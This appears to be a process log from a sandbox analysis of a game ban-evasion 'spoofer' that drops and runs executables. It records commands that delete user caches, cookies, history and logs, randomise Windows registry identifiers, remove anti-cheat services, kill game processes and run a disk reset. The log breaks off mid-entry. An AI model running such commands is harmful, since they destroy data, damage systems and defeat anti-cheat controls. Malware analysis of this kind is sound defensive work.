- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:1440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2096
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 24198201561798248541255812764316837626190585748 /f
      4⤵
      PID:1228
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:1644
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2576
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 241982015617982485412558127643168376261905857482404724741 /f
      4⤵
      PID:200
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:2668
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2188
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 241982015617982485412558127643168376261905857482404724741 /f
      4⤵
      Modifies registry key
      PID:2356
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:2476
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2040
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 2419820156179824854125581276431683762619058 /f
      4⤵
      Modifies Internet Explorer settings
      PID:1780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:2644
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2419820156179824854125581276431683762619058 /f
      4⤵
      PID:1736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:2308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2168
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 242013090519662161502287216691202746992801 /f
      4⤵
      PID:764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:1512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2452
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 242013090519662 /f
      4⤵
      Modifies registry key
      PID:1624
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2544
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 242013090519662 /f
      4⤵
      Modifies registry key
      PID:2108
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:2572
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:2360
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2600
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 242013090519662 /f
      4⤵
      PID:1256
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:2396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 242013090519662 /f
      4⤵
      PID:200
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:1660
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1616
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 242013090519662161502287216691202746992801323682389924785 /f
      4⤵
      PID:1780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:2460
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:1376
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {24201-30905-1966216150} /f
      4⤵
      PID:2864
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:2720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\Cleaner.exe
    3⤵
    - Loads dropped DLL
    PID:1592
  - - C:\Windows\IME\Cleaner.exe
      C:\Windows\IME\Cleaner.exe
      4⤵
      Executes dropped EXE
      Enumerates system info in registry
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious use of AdjustPrivilegeToken
      PID:1320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:2664
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:2996
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:2452
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:1916
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:2544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:3060
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:984
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:1960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:2132
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2420
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:2612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:1668
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:2556
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:1744
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:2964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:772
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\ntuser.ini
    3⤵
    PID:2160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:1756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\System Volume Information\IndexerVolumeGuid
    3⤵
    PID:2184
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:2480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:1416
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:556
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Windows\System32\restore\MachineGuid.txt
    3⤵
    PID:2460
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:2752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:2740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:2056
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache
    3⤵
    PID:2964
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    3⤵
    PID:1364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\ConnectedDevicesPlatform\L.%username%\ActivitiesCache.db-wal
    3⤵
    PID:2360
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:204
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:2320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs\User
    3⤵
    PID:2428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2532
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\LocalService\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp
    3⤵
    PID:1780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\cache\qtshadercache
    3⤵
    PID:892
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\UsrClass.dat.log2
    3⤵
    PID:2328
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\VkCache
    3⤵
    PID:2596
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\CN\NewsFeed
    3⤵
    PID:2720
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0\UsageLogs
    3⤵
    PID:344
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Temp
    3⤵
    PID:2504
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp
    3⤵
    PID:2768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\mac.exe
    3⤵
    - Loads dropped DLL
    PID:2216
  - - C:\Windows\IME\mac.exe
      C:\Windows\IME\mac.exe
      4⤵
      Executes dropped EXE
      PID:2572
- C:\Users\Admin\AppData\Local\Temp\nExOs.exe
  "C:\Users\Admin\AppData\Local\Temp\nExOs.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1068
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe >nul 2>&1
    3⤵
    PID:2548
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color b
    3⤵
    PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c color 4
    3⤵
    PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe Reset-PhysicalDisk * >nul 2>&1
    3⤵
    PID:2076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Reset-PhysicalDisk *
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:2604
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:1320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:1448
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:876
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:1996
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:2768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2036
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 242013090519662161502287216691202746992801323682389924785 /f
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:1352
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1548
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 242013090519662161502287216691202746992801323682389924785 /f
      4⤵
      Modifies registry key
      PID:572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2716
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-24201 /f
      4⤵
      PID:992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1048
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-24201 /f
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste%random%-%random%-%random%-%random% /f
    3⤵
    PID:1136
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Paste24201-30905-19662-16150 /f
      4⤵
      PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-%random%-%random} /f
    3⤵
    PID:588
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Paste-24201-%random} /f
      4⤵
      PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:2320
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Paste-242013090519662 /f
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:220
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Paste-24201 /f
      4⤵
      PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-%random% /f
    3⤵
    PID:1532
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Paste-24201 /f
      4⤵
      Modifies registry key
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-%random%%random%%random% /f
    3⤵
    PID:880
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Paste-242013090519662 /f
      4⤵
      Enumerates system info in registry
      PID:1416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1528
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-24201-30905-1966216150} /f
      4⤵
      PID:2656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2728
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Paste-24201-30905-1966216150} /f
      4⤵
      PID:1036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2548
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Paste-24201-30905-1966216150} /f
      4⤵
      PID:2984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:1736
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      Modifies registry key
      PID:3052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:2876
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-%random%-%random%-%random%%random% /f
    3⤵
    PID:3044
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d Paste-24201-30905-1966216150 /f
      4⤵
      PID:2596
- - C:\Windows\system32\cmd.exe
